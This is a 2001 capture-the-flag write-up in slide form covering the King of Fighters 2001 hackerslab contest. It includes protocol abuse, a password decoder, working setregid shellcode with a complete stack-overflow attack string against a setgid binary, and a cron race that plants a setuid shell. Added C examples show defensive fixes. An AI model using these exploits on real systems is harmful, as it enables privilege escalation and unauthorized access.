King Of Fighters 2001 The Best of Best HackerGroup


1 King Of Fighters 2001 The Best of Best HackerGroup
    Null@Root

2 Level 1
Environment :
    Zolazola.exe : P2P Communication Program
Target : http://kof.hackerslab.org/cgi-bin/level1/idaccess.cgi
- 1 - 2001/09/06

3 Level 1 (continue)
Finding Vulnerability
- String from the zolazola executable file
    ID : guest
    Password : gZuOeLsAt
- Packet sniffing
    Server : 203.239.xxx.xxx : 2900
    Command list : KOFLOG, KOFGETLIST, KOFMESSAGE, KOFGETINFO, KOFOK, KOFFRI, KOFPUTERR, KOFPUTINFO

4 Level 1 (continue)
Protocol exchange (the slide draws two columns, Client PC and Server):
    KOFLOG guest dXtOfNuEy
    KOFGTLIST guest
    KOFOK 0
    KOFPUTERR level1
    KOFFRI level1
    ROFFRI level2
    KOFFRI guest
    KOFMSG guest level1 Hi! are you there?
    KOFGETINFO guest level1

5 Level 1 (continue)
ATTACK
    telnet 203.255.xxx.xxx 2900
    KOFGETINFO guest guest              (I want guest's information.)
    KOFPUTINFO guest eYuPgOwFz gZuOeLsAt
    KOFGETLIST level2                   (Who is level2's friend?)
    KOFFRI kof_moniter
    KOFGETINFO kof_moniter level2
    KOFPUTINFO level2 eDttvdvYQVn level2@kof.hackerslab.org level2user
    KOFPUTINFO level2 fEuuwewZRWo level2@kof.hackerslab.org level2user
    KOFPUTINFO level2 gFvvxfx[SXp level2@kof.hackerslab.org level2user
    KOFPUTINFO level2 eDttvdvYQVn level2@kof.hackerslab.org level2user

6 Level 1 (continue)
ENCODE (each byte of the password is shifted by an offset that grows by one per position)

    plain  :  g  Z  u  O  e  L  s  A  t
    shift  : -2 -1  0 +1 +2 +3 +4 +5 +6
    cipher :  e  Y  u  P  g  O  w  F  z

    plain  :  g  Z  u  O  e  L  s  A  t
    shift  : -3 -2 -1  0 +1 +2 +3 +4 +5
    cipher :  d  X  t  O  f  N  u  E  y

7 Level 1 (continue)
DECODE

    #include <stdio.h>
    #include <string.h>

    /* Try every starting offset i: byte j of the input is shifted by (i - j)
       and each candidate plaintext is printed on its own line. */
    int main(int argc, char **argv)
    {
        int i, j, dy;
        int src_len;
        char *src, ch;

        if (argc < 2) {
            fprintf(stderr, "usage: %s <encoded-string>\n", argv[0]);
            return 1;
        }
        src = argv[1];
        src_len = strlen(src);
        for (i = 0; i < src_len; i++) {
            for (j = 0, dy = i; j < src_len; j++, dy--) {
                ch = *(src + j);
                printf("%c", ch + dy);
            }
            printf("\n");
        }
        return 0;
    }

Result

    $ ./dec1 eDttvdvYQVn
    eCrqr_pRIMd
    fDsrs`qSJNe
    gEtstarTKOf
    hFutubsULPg
    iGvuvctVMQh
    jHwvwduWNRi
    kIxwxevXOSj
    lJyxyfwYPTk
    mKzyzgxZQUl
    nL{z{hy[RVm
    oM|{|iz\SWn
    pN}|}j{]TXo

One of these rows is level2's password.
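The ENCODE and DECODE slides describe the same transform from two sides. The block below is an added example, not code from the Null@Root slides: it implements the position-dependent shift in both directions so the security point is visible in one place. There is no key, only a small starting offset, so whoever captures the wire value (the slides show it was obtained by packet sniffing) recovers the password with one subtraction per byte. The function names `kof_shift`, `kof_encode` and `kof_decode` are this example's own; the values in `main` are the ones printed on the slides.

```c
#include <stdio.h>
#include <string.h>

/*
 * The zolazola "encoding" shifts byte j of the password by (start + j):
 * the first byte by start, the second by start + 1, and so on.  Decoding
 * is the same walk with the sign flipped.  Nothing secret is involved,
 * which is why this is obfuscation rather than encryption.
 *
 * direction = +1 encodes, -1 decodes.  At most cap - 1 bytes are written
 * to out, which is always NUL-terminated when cap > 0.
 */
void kof_shift(const char *in, char *out, size_t cap, int start, int direction)
{
    size_t n = strlen(in);
    size_t i;

    if (cap == 0)
        return;
    if (n > cap - 1)
        n = cap - 1;
    for (i = 0; i < n; i++)
        out[i] = (char)(in[i] + direction * (start + (int)i));
    out[n] = '\0';
}

void kof_encode(const char *plain, char *out, size_t cap, int start)
{
    kof_shift(plain, out, cap, start, +1);
}

void kof_decode(const char *wire, char *out, size_t cap, int start)
{
    kof_shift(wire, out, cap, start, -1);
}

int main(void)
{
    char wire[32], plain[32];

    /* Password and offset from the ENCODE slide: gZuOeLsAt with start -2. */
    kof_encode("gZuOeLsAt", wire, sizeof wire, -2);
    kof_decode(wire, plain, sizeof plain, -2);
    printf("encode: %s\ndecode: %s\n", wire, plain);

    /* The value sent in KOFPUTINFO for level2, decoded with the same offset. */
    kof_decode("eDttvdvYQVn", plain, sizeof plain, -2);
    printf("level2 value decodes to: %s\n", plain);
    return 0;
}
```

Compared with the brute-force decoder on the slide, this version takes the offset as a parameter; the brute-force output is simply this function evaluated for every start value, which is why a twelve-character captured value yields only twelve candidates.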

8 Level 1 (complete)
    Conguratulations! The IP for the next level is 203.255.xxx.xxx. And ID is h3047.

9 Level 2
Environment
    Server : Linux kernel 2.4.9 (203.255.xxx.xxx)
    GCC : egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
Target : /usr/local/apache/cgi-bin/idaccess.cgi

10 Level 2 (continue)
Finding Vulnerability
/usr/games directory file list

    drwxrwxr-x  3 root   level2 352256 Aug 25 17:50 .
    drwxr-xr-x 19 root   root     4096 Aug 23 22:38 ..
    -rw-rw----  1 level2 level2     98 Aug 25 17:50 check
    -rw-r--r--  1 level2 level2    763 Aug 25 17:50 score
    -rw-r-----  1 h3579  level2      0 Aug 25 17:50 score.13210
    -rwxr-sr-x  1 root   level2  17542 Aug 25 06:20 solveit

11 Level 2 (continue)
- solveit works like this:

    Input ID : (input id, up to 129 bytes)
    (123+456)*789-(456+123)*789 = (input result)
    (nn1+nn2)*nn3-(nn5+nn5)*nn6 = (input result)
    Do you play again(y/n)? (input data)

    20 times

12 Level 2 (continue)
Information from the solveit binary file
ID field input length : up to 129 bytes, starting at ebp + 0xffffff78

    0x8048d0d : push   $0x81                    <- length
    0x8048d12 : lea    0xffffff78(%ebp),%eax    <- start position
    0x8048d18 : push   %eax
    0x8048d19 : push   $0x8049005
    0x8048d1e : call   0x8048854
    (gdb) x/bs 0x8049005
    0x8049005 : "Input your id: "

13 Level 2 (continue)
The last question's input length is affected by the ID field's last byte

    0x8048db7 : mov    0xfffffff8(%ebp),%eax    <- get_yn's length
    0x8048dba : push   %eax
    0x8048dbb : push   $0x8049042
    0x8048dc0 : call   0x80488c0
    0x8048dc5 : add    $0x8,%esp
    (gdb) x/bs 0x8049042
    0x8049042 : "Do you play again? (y/n) "

14 Level 2 (continue)
Function get_yn uses 4 bytes of stack

    Dump of assembler code for function get_yn:
    0x80488c0 : push   %ebp
    0x80488c1 : mov    %esp,%ebp
    0x80488c3 : sub    $0x4,%esp                <- get_yn's stack (4 bytes)
    0x80488c6 : push   $0x4
    0x80488c8 : push   $0x0
    0x80488ca : lea    0xfffffffc(%ebp),%eax
    0x80488cd : push   %eax
    0x80488ce : call   0x8048730
    0x80488d3 : add    $0xc,%esp
    0x80488d6 : mov    0xc(%ebp),%eax
    0x80488d9 : push   %eax
    0x80488da : lea    0xfffffffc(%ebp),%eax
    0x80488dd : push   %eax
    0x80488de : mov    0x8(%ebp),%eax
    0x80488e1 : push   %eax
    0x80488e2 : call   0x8048854
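Slides 12 to 14 show the defect pattern: the read helper at 0x8048854 takes a prompt, a buffer and a length, the caller supplies the length, and for get_yn that length lives in a stack slot that the 129-byte ID input can reach. The read helper trusts the length it is handed, so a corrupted length lets the 4-byte answer buffer overflow. The block below is an added example, not solveit's code or Null@Root's: it is the bounded form of that helper, where the buffer's real capacity travels with the buffer and the caller's request is clamped to it, and the unread tail of an over-long line is discarded so it cannot leak into the next prompt. `read_field`, `get_yn` and `sample_stream` are this example's own names; the assumption that the ID buffer is shorter than the 0x81 bytes requested follows from the slide's statement that the ID's last byte lands on get_yn's length.

```c
#include <stdio.h>
#include <string.h>

/*
 * Bounded prompt-and-read.  cap is the real size of buf; requested is what
 * the caller asks for (the equivalent of the 0x81 pushed for the ID field,
 * or the value loaded from -8(%ebp) for get_yn).  Whatever requested says,
 * at most cap - 1 bytes are stored plus a NUL terminator.  If the line was
 * longer than the limit the rest of it is consumed and dropped, so the
 * overflow bytes can neither corrupt memory nor answer the next question.
 * Returns the number of bytes stored (excluding the terminator).
 */
size_t read_field(FILE *in, const char *prompt, char *buf, size_t cap, size_t requested)
{
    size_t limit = requested < cap ? requested : cap;   /* clamp to real capacity */
    size_t len;

    if (prompt) {
        fputs(prompt, stdout);
        fflush(stdout);
    }
    if (limit == 0 || !fgets(buf, (int)limit, in)) {
        if (cap)
            buf[0] = '\0';
        return 0;
    }
    len = strlen(buf);
    if (len && buf[len - 1] == '\n') {
        buf[--len] = '\0';                 /* whole line fitted: strip the newline */
    } else {
        int c;                             /* line exceeded the limit: drain the rest */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return len;
}

/* Counterpart of solveit's get_yn: a 4-byte answer buffer that stays intact
   even when the length argument has been corrupted to a huge value. */
int get_yn(FILE *in, size_t requested)
{
    char answer[4];

    read_field(in, "Do you play again? (y/n) ", answer, sizeof answer, requested);
    return answer[0] == 'y' || answer[0] == 'Y';
}

/* Demonstration helper: turn constructed input text into a readable stream
   (tmpfile is standard C, so no platform-specific calls are needed). */
FILE *sample_stream(const char *text)
{
    FILE *f = tmpfile();

    if (!f)
        return NULL;
    fputs(text, f);
    rewind(f);
    return f;
}

int main(void)
{
    /* Constructed input: a short ID, then an answer line far longer than
       4 bytes, then a normal "n".  The second get_yn is called with a
       length as corrupted as the slide describes. */
    FILE *in = sample_stream("alice\nyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\nn\n");
    char id[8];

    if (!in)
        return 1;
    printf("id bytes stored: %zu\n", read_field(in, "Input your id: ", id, sizeof id, 0x81));
    printf("get_yn (corrupted length): %d\n", get_yn(in, (size_t)0x7fffffff));
    printf("get_yn (next line): %d\n", get_yn(in, (size_t)0x7fffffff));
    fclose(in);
    return 0;
}
```

The design point is that a length supplied by the caller is untrusted data once any earlier input can reach the stack slot holding it; binding the capacity to the buffer at the point of declaration (`sizeof answer`) removes the dependency on that slot entirely.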

15 Level 2 (continue)
ATTACK for level2's gid shell
Modify the setreuid shell code into setregid shell code (setreuid(0,0) -> setregid(501,501)):

    \x31\xdb\x31\xc9\xf7\xe3\x66\x81\xc3\xf5\x01\x66\x81\xc1\xf5
    \x01\xb0\x47\xcd\x80\x31\xdb\x31\xc9\x53\x68\x6e\x2f\x73\x68
    \x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80

Attack string format (129 bytes):

    [Nop + setregid shell + Nop] + [math quiz answer] + [AAAA][ebp][return address]

16 Level 2 (continue)
Attack string

    (printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
    \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
    \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x31\xc9\xf7
    \xe3\x66\x81\xc3\xf5\x01\x66\x81\xc1\xf5\x01\xb0\x47\xcd\x80\x31\xdb\x31\xc9
    \x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b
    \xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x34\x37
    \x32\x33\x32\x0a\x39\x37\x34\x37\x35\x0a\x35\x31\x30\x30\x33\x0a\x36\x38\x32
    \x32\x30\x0a\x38\x34\x34\x34\x35\x0a\x34\x32\x33\x30\x31\x0a\x34\x34\x39\x35
    \x32\x0a\x35\x34\x38\x34\x30\x0a\x37\x35\x31\x31\x30\x0a\x34\x34\x37\x36\x38
    \x0a\x31\x33\x30\x39\x32\x32\x0a\x34\x32\x36\x37\x36\x0a\x31\x32\x30\x37\x32
    \x30\x0a\x36\x30\x34\x35\x36\x0a\x31\x31\x31\x39\x35\x31\x0a\x31\x30\x36\x38
    \x31\x36\x0a\x35\x33\x31\x33\x33\x0a\x38\x35\x31\x38\x31\x0a\x39\x39\x32\x39
    \x37\x0a\x38\x32\x34\x35\x37\x0a\x41\x41\x41\x41\x58\xfb\xff\xbf\x40\xfc\xff
    \xbf\x0a"; cat)|./solveit

17 Level 2 (continue)
We could modify main.html of level2 with level2 gid privilege, but the "Target" needs level2 uid.
Finding another vulnerability: the /usr/games/check file.

    sh-2.04$ cat check
    for file in /usr/games/score.* ; do /bin/cat $file >> /usr/games/score ; /bin/rm -f $file ; done

level2's cron job does this: rm check, make check, do check

18 Level 2 (continue)
ATTACK for level2's uid shell
/var/spool/cron/crontabs/level2 had a race condition.
Cron (at every 10 min): rm check, make check, do check
Attacker: replace the check file (include my job)

19 Level 2 (continue)
- Prepared setreuid shell (binary file : /tmp/wsh)

    #include <stdlib.h>
    #include <unistd.h>

    int main(void)
    {
        setreuid(501, 501);
        system("/bin/sh");
        return 0;
    }

- Attack script (filename : exp.sh)

    echo "cp /tmp/wsh /tmp/nullroot; chmod 4755 /tmp/nullroot" > /usr/games/check

    $ ./exp.sh
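Slides 17 to 19 turn on two properties of the cron job: the script it runs is group-writable (`-rw-rw---- level2 level2 check` in the listing on slide 10), and it is removed and recreated on every run, so there is a window in which whatever the group writes into `check` is what cron executes. The block below is an added example, not code from the slides or from the contest system: it is the check a job runner can apply before executing a file, written in C so that it inspects the opened descriptor rather than the path name, which is the only way to avoid reopening the same check-then-use gap the slides exploit. `open_trusted_job`, `check_job_file`, `write_sample_job` and the `job_status` values are this example's own; the sample script text is the `check` loop from slide 17 with the variables quoted, and the file path under /tmp is a constructed name.

```c
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

/* Reasons a job file is refused; JOB_OK means it may be executed. */
enum job_status {
    JOB_OK = 0,
    JOB_CANNOT_OPEN,
    JOB_NOT_REGULAR,
    JOB_WRONG_OWNER,
    JOB_GROUP_OR_WORLD_WRITABLE
};

/*
 * Open the job file and examine the descriptor that was actually opened.
 * Checking the path with stat() and then opening it again would leave a
 * window in which the file can be swapped, which is exactly the race the
 * cron job on the slides has.  On JOB_OK *fd_out holds the descriptor the
 * caller should execute from (fexecve, or /bin/sh /dev/fd/N); otherwise
 * it is -1 and nothing is left open.
 */
enum job_status open_trusted_job(const char *path, uid_t expected_owner, int *fd_out)
{
    struct stat st;
    int fd;

    *fd_out = -1;
    fd = open(path, O_RDONLY);
    if (fd < 0)
        return JOB_CANNOT_OPEN;
    if (fstat(fd, &st) < 0) {
        close(fd);
        return JOB_CANNOT_OPEN;
    }
    if (!S_ISREG(st.st_mode)) {               /* no directories, devices, fifos */
        close(fd);
        return JOB_NOT_REGULAR;
    }
    if (st.st_uid != expected_owner) {         /* only the job owner's own file */
        close(fd);
        return JOB_WRONG_OWNER;
    }
    if (st.st_mode & (S_IWGRP | S_IWOTH)) {    /* the property 'check' had: group-writable */
        close(fd);
        return JOB_GROUP_OR_WORLD_WRITABLE;
    }
    *fd_out = fd;
    return JOB_OK;
}

/* Verdict only: open, check, release. */
enum job_status check_job_file(const char *path)
{
    int fd;
    enum job_status s = open_trusted_job(path, getuid(), &fd);

    if (fd >= 0)
        close(fd);
    return s;
}

/* Demonstration helper: write a constructed job script with the given mode. */
int write_sample_job(const char *path, mode_t mode)
{
    FILE *f = fopen(path, "w");

    if (!f)
        return -1;
    fputs("#!/bin/sh\n"
          "for file in /usr/games/score.* ; do "
          "/bin/cat \"$file\" >> /usr/games/score ; /bin/rm -f \"$file\" ; done\n", f);
    fclose(f);
    return chmod(path, mode);
}

int main(void)
{
    const char *path = "/tmp/kof_check_example.sh";   /* constructed path */

    if (write_sample_job(path, 0600) == 0)
        printf("mode 0600 -> status %d (0 = ok)\n", check_job_file(path));
    if (write_sample_job(path, 0660) == 0)
        printf("mode 0660 -> status %d (4 = group/world writable)\n", check_job_file(path));
    remove(path);
    return 0;
}
```

Even with this check in place, a job that is deleted and rewritten on every run offers the same window again each time; the durable fix is a script that is created once, owned by the job's user, mode 0700 or tighter, in a directory the group cannot write to.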

20 Level 2 (complete)

    Congraturation!, You passed level 2.
    Now challenge level 3 system !!
    level3 system's IP adress is 203.255.xxx.xxx
    Make your page in /usr/local/apache/htdocs/main.html
    귀하의 ID 와 패스워드를 가지고 level3 서버에 telnet 서비스 접속이 가능합니다.
    level3 시스템의 root 권한을 획득한 후 level3 서버내의 idaccess 라는 프로그램을 실행시키시오
    Now challenge level 3 system !!
    You can connect level 3 system's telnet service, by using your "Registration Number" and password.
    You must get a root privilege, and find a excutable file "idaccess" in any location in level 3 system
    After that, if you excute "idaccess" and input your registration information.
    then you will get qualification for passing level 3,

21 Level 3
Environment :
    Server : Solaris 5.8 i386 (203.255.xxx.xxx)
    GCC : 2.9x
Target : ??

22 Level 3
1. Checking vulnerability
    1.1 search known bugs
    1.2 port scan
    1.3 search setuid root files
    1.4 boot sequence check
2. Found a login problem (202-byte login ID)
    attack string format : [ serial_no(13) + nop(95) + shell code(93) + return address(4) ]
3. We did not have enough time to exploit it, so we gave up level3 and defended level2's homepage instead.

23 Conclusion
- We worried about P2P on the eve of that game.
- level2 was not so easy to solve directly.
- There were no special privileges to keep main.html of level2.
- Players need some attention for their work; script kiddies copied solveit's exploit from /tmp.
- Anybody can get level2's uid by peeking at the /usr/games/check file.
- level3 was difficult for us because we didn't have much experience with Solaris.
- We thought all of the levels were very nice; thanks to hackerslab.
